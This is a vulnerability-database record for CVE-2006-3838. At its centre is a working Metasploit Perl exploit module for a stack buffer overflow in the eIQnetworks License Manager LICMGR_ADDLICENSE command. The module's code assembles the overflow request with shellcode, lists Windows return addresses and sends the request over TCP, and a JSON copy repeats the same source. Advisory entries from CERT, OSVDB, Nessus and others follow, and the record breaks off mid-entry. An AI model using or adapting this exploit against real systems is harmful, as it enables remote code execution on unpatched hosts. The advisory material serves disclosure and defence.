ID EDB-ID:2074 Type exploitdb Reporter ri0t Modified 2006-07-26T00:00:00
Description
eIQnetworks License Manager Remote Buffer Overflow Exploit (1262). CVE-2006-3838. Remote exploit for windows platform
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_1262;
use base "Msf::Exploit";
use strict;
use Pex::Text;
# Module-level tables that new() hands to the Msf::Exploit base constructor.
# No advanced options are defined for this module.
my $advanced = { };
# Metadata for a module aimed at the LICMGR_ADDLICENSE buffer overflow in the
# eIQnetworks License Manager (CVE-2006-3838 per the record this file ships
# with). The advisories bundled with that record give ESA 2.5.0 as the fixed
# release, so anything older should be treated as exposed.
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
# NOTE(review): the meaning of 'Priv' is defined by the framework and is not
# visible in this file.
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
# Each option is [flag, type, description, optional default]; the leading 1
# presumably marks the option as required -- confirm against the framework.
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
# 10616/tcp is the port ZDI-06-024 names as the License Manager default; it
# should not be reachable from untrusted networks.
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
# Same 1262-byte figure that Exploit() uses when sizing the filler.
'Space' => 1262,
# Bytes kept out of the encoded payload: NUL, LF, CR, '@' and '&'. '&' is the
# field delimiter of the request built in Exploit(); why the others are
# excluded is not shown here (presumably they disturb the server's parsing).
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
in size. This module should work on all rebranded eiq analysers. Exploitation
assistance from KF of digital munition.
}),
# Index into 'Targets'; presumably zero-based, i.e. the Windows XP entry --
# confirm against the framework.
'DefaultTarget' => 1,
# Each entry is [label, 32-bit address]. Exploit() packs element [1] and places
# it directly after the 1262-byte buffer. The addresses are fixed per OS
# build, so the technique depends on a predictable memory layout -- the
# property that address-space randomisation on later Windows releases removes.
'Targets' =>
[
['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx
['Windows XP English SP1/SP2', 0x77db64dc ], # jmp ebx
['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx
],
};
# Constructor: forwards this module's $info and $advanced tables, followed by
# whatever arguments the caller supplied, to the Msf::Exploit base constructor
# and returns the resulting object.
sub new {
    my $class = shift;
    my %module_tables = (
        'Info'     => $info,
        'Advanced' => $advanced,
    );
    my $self = $class->SUPER::new(\%module_tables, @_);
    return $self;
}
# Builds one LICMGR_ADDLICENSE request and sends it to RHOST:RPORT over TCP.
#
# Request layout, as assembled below:
#   "LICMGR_ADDLICENSE&" . <1262 bytes: filler + encoded payload>
#                        . <4-byte address> . "&"
#
# Nothing is read back from the socket, so this sub does not report whether
# the target was affected. Returns nothing in every path.
#
# Defensive notes: the request always begins with the ASCII command
# "LICMGR_ADDLICENSE&" and carries a 1266-byte argument before the closing
# "&", which gives a stable anchor for network detection on the License
# Manager port. The advisories shipped with this record list ESA 2.5.0 as the
# fixed version.
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
# Selected [label, address] pair from the 'Targets' table; the index is not
# range-checked here.
my $target = $self->Targets->[$target_idx];
# Filler length is chosen so that filler + payload totals 1262 bytes.
# MakeNops is a framework helper; presumably it returns that many bytes.
my $nops = $self->MakeNops(1262 - length($shellcode));
# "V" packs the address as a 32-bit little-endian value.
my $ret = pack("V", $target->[1]);
my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
# Outbound TCP connection; the local source port comes from the CPORT option.
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
# On connection failure, report the error and stop without sending anything.
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
# The double quotes only stringify $evil; the whole request goes out in a
# single Send call and the socket is not explicitly closed in this sub.
$s->Send("$evil");
return;
}
# milw0rm.com [2006-07-26]
{"bulletinFamily": "exploit", "id": "EDB-ID:2074", "cvelist": ["CVE-2006-3838"], "modified": "2006-07-26T00:00:00", "lastseen": "2016-01-31T15:28:13", "edition": 1, "sourceData": "#!/usr/bin/perl -w\n\n#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs\n\npackage Msf::Exploit::EiQ_License_1262; \nuse base \"Msf::Exploit\";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\t'Name' => 'EIQ License Manager Overflow',\n\t'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],\n\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t\n\t'AutoOpts' => { 'EXITFUNC' => 'seh' },\n\t\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 10616],\n\t },\n 'Payload' =>\n\t {\n\t\t'Space' => 1262,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x40\\x26\",\n },\n 'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits the buffer overflow found in the LICMGR_ADDLICENSE\n Field of EIQ networks network analyser this module exploits buffers of 1262 bytes\n\tin size. This module should work on all rebranded eiq analysers. 
Exploitation\n\tassistance from KF of digital munition.\n }),\n \n \n 'DefaultTarget' => 1,\n\t'Targets' =>\n\t [\n\t ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx\n\t\t['Windows XP English SP1/SP2', 0x77db64dc ],\t# jmp ebx\n\t ['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx\n\t ],\n \n };\n \n sub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n \n sub Exploit {\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n my $nops \t= $self->MakeNops(1262 - length($shellcode));\n my $ret = pack(\"V\", $target->[1]);\n my $evil = \"LICMGR_ADDLICENSE&\" . $nops . $shellcode . $ret . \"&\";\n\t\n \n my $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n \t );\n \n if ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n $self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using return address 0x%.8x....\", $target->[1]));\n \n $s->Send(\"$evil\");\n return;\n }\n\n# milw0rm.com [2006-07-26]\n", "published": "2006-07-26T00:00:00", "href": "https://www.exploit-db.com/exploits/2074/", "osvdbidlist": ["27526"], "reporter": "ri0t", "hash": "453777bb9bfa9bd720a5b580da844bd86a2b50a174e7e1453e427e9cbae57db8", "title": "eIQnetworks License Manager Remote Buffer Overflow Exploit 1262", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "eIQnetworks License Manager Remote Buffer Overflow Exploit (1262). CVE-2006-3838. 
Remote exploit for windows platform", "references": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2074/", "enchantments": {"vulnersScore": 7.2}}
{"result": {"cve": [{"id": "CVE-2006-3838", "type": "cve", "title": "CVE-2006-3838", "description": "Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).", "published": "2006-07-26T21:04:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-07-20T10:49:26"}], "cert": [{"id": "VU:513068", "type": "cert", "title": "eIQnetworks Enterprise Security Analyzer Syslog server buffer overflow", "description": "### Overview\n\nThe eIQnetworks Enterprise Security Analyzer Syslog server contains a buffer overflow vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Enterprise Security Analyzer**\n\neIQnetworks [Enterprise Security Analyzer](<http://www.eiqnetworks.com/products/EnterpriseSecurityAnalyzer.shtml>) (ESA) \"`... 
pro``vides essential real-time security intelligence to help decipher hacker/virus behavior, combat security threats and meet regulatory compliance requirements across the entire IT infrastructure \u2013 network devices and hosts.`\" ESA is also provided on an OEM basis as Astaro Report Manager, Fortinet FortiReporter, iPolicy Security Reporter, SanMina Viking Multi-Log Manager, Secure Computing G2 Security Reporter, and Top Layer Network Security Analyzer. \n \n**ESA Syslog server** \n \nThe ESA Syslog server is provided by the `SyslogServer.exe` executable. This server collects data from managed machines and listens on `10617/tcp`. \n \n**The problem** \n \nThe ESA Syslog server contains a buffer overflow vulnerability. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a system running the vulnerable Syslog component. \n \n--- \n \n### Solution\n\n**Apply an update** \nThis vulnerability is addressed in eIQnetworks [ESA 2.5.0](<http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf>). \n \nOEM versions of ESA, including Astaro Report Manager, Fortinet FortiReporter, iPolicy Security Reporter, SanMina Viking Multi-Log Manager, Secure Computing G2 Security Reporter, and Top Layer Network Security Analyzer should be updated to version 4.5.4 or later. \n \n--- \n \n \n**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by eIQnetworks ESA Syslog server (typically `10617/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. 
It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nAstaro| | -| 01 Aug 2006 \neIQnetworks| | -| 01 Aug 2006 \nFortinet, Inc.| | 01 Aug 2006| 01 Aug 2006 \nSecure Computing Network Security Division| | 01 Aug 2006| 01 Aug 2006 \nTop Layer Networks, Inc.| | 01 Aug 2006| 01 Aug 2006 \nViking InterWorks| | -| 01 Aug 2006 \niPolicy Networks| | -| 16 Aug 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23513068 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.eiqnetworks.com/support/Security_Advisory.pdf>\n * <http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf>\n * <http://www.zerodayinitiative.com/advisories/TSRT-06-03.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-023.html>\n * <http://secunia.com/advisories/21211/>\n * <http://secunia.com/advisories/21213/>\n * <http://secunia.com/advisories/21214/>\n * <http://secunia.com/advisories/21215/>\n * <http://secunia.com/advisories/21217/>\n * <http://www.auscert.org.au/6544>\n\n### Credit\n\nThis vulnerability was disclosed by TippingPoint, who in turn credit Cody Pierce.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-3838](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838>)\n * Date Public: 26 Jul 2006\n * Date First Published: 18 Jan 2007\n * Date Last Updated: 18 Jan 2007\n * Severity Metric: 34.79\n * Document Revision: 13\n\n", "published": "2007-01-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/513068", 
"cvelist": ["CVE-2006-3838", "CVE-2006-3838"], "lastseen": "2016-02-03T09:12:24"}], "packetstorm": [{"id": "PACKETSTORM:48651", "type": "packetstorm", "title": "eIQ-ESA.txt", "description": "", "published": "2006-07-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/48651/eIQ-ESA.txt.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:13:14"}, {"id": "PACKETSTORM:48650", "type": "packetstorm", "title": "eIQ-LM-3.txt", "description": "", "published": "2006-07-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/48650/eIQ-LM-3.txt.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:14:46"}, {"id": "PACKETSTORM:83050", "type": "packetstorm", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83050/eIQNetworks-ESA-License-Manager-LICMGR_ADDLICENSE-Overflow.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:20:12"}, {"id": "PACKETSTORM:83079", "type": "packetstorm", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83079/eIQNetworks-ESA-Topology-DELETEDEVICE-Overflow.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:25:20"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/MISC/EIQNETWORKS_ESA", "type": "metasploit", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. 
During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.", "published": "2006-09-12T05:46:42", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2006-3838"], "lastseen": "2018-01-14T02:07:13"}, {"id": "MSF:EXPLOIT/WINDOWS/MISC/EIQNETWORKS_ESA_TOPOLOGY", "type": "metasploit", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.", "published": "2006-09-12T05:46:42", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2006-3838"], "lastseen": "2018-02-05T18:17:28"}], "nessus": [{"id": "ESA_SYSLOG_CMD_ARGUMENT_OVERFLOWS.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer Syslog Server Multiple Remote Overflows", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host is affected by multiple stack-based buffer overflows in its Syslog Service. 
Using a long argument to any of several commands, an unauthenticated, remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22127", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-02-24T01:01:13"}, {"id": "ESA_LICMGR_ADDLICENSES_OVERFLOW.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Overflow", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host contains a buffer overflow in its License Manager service. Using a long argument to the 'LICMGR_ADDLICENSE' command, an unauthenticated remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22129", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-09-26T17:26:34"}, {"id": "ESA_MONITORING_CMD_ARG_OVERFLOWS.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer Monitoring.exe Multiple Command Overflow", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host contains a buffer overflow in its Monitoring Agent service. 
Using a long argument to a command, an unauthenticated, remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22196", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-02-24T01:03:36"}], "exploitdb": [{"id": "EDB-ID:16451", "type": "exploitdb", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow. CVE-2006-3838. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16451/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-02-01T23:53:56"}, {"id": "EDB-ID:16438", "type": "exploitdb", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "eIQNetworks ESA Topology DELETEDEVICE Overflow. CVE-2006-3838. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16438/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-02-01T23:52:06"}, {"id": "EDB-ID:2140", "type": "exploitdb", "title": "eIQnetworks License Manager Remote Buffer Overflow Exploit multi", "description": "eIQnetworks License Manager Remote Buffer Overflow Exploit (multi). CVE-2006-3838. 
Remote exploit for windows platform", "published": "2006-08-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/2140/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-01-31T15:36:36"}], "osvdb": [{"id": "OSVDB:27525", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer syslogserver.exe Pre-authentication Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. 
With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-023.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0603.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: ZDI-06-023\nKeyword: \n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27525", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27529", "type": "osvdb", "title": "eIQnetworks 
Enterprise Security Analyzer Monitoring.exe Unspecified Issue", "description": "## Vulnerability Description\nAn unspecified remote vulnerability exists in eIQnetworks Enterprise Security Analyzer Monitoring.exe. With a specially crafted request sent to port TCP 9999, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAn unspecified remote vulnerability exists in eIQnetworks Enterprise Security Analyzer Monitoring.exe. With a specially crafted request sent to port TCP 9999, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: 
http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TCP Port 9999\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27529", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27526", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The license manager daemon (EnterpriseSecurityAnalyzer.exe) fails to perform proper bounds checking on the LICMGR_ADDLICENSE commands resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The license manager daemon (EnterpriseSecurityAnalyzer.exe) fails to perform proper bounds checking on the LICMGR_ADDLICENSE commands resulting in a buffer overflow. 
With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0602.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TCP port 10616\nKeyword: ZDI-06-024\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27526", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27527", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer syslogserver.exe Multiple Command Remote 
Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on various commands passed through TCP port 10617, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on various commands passed through TCP port 10617, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory 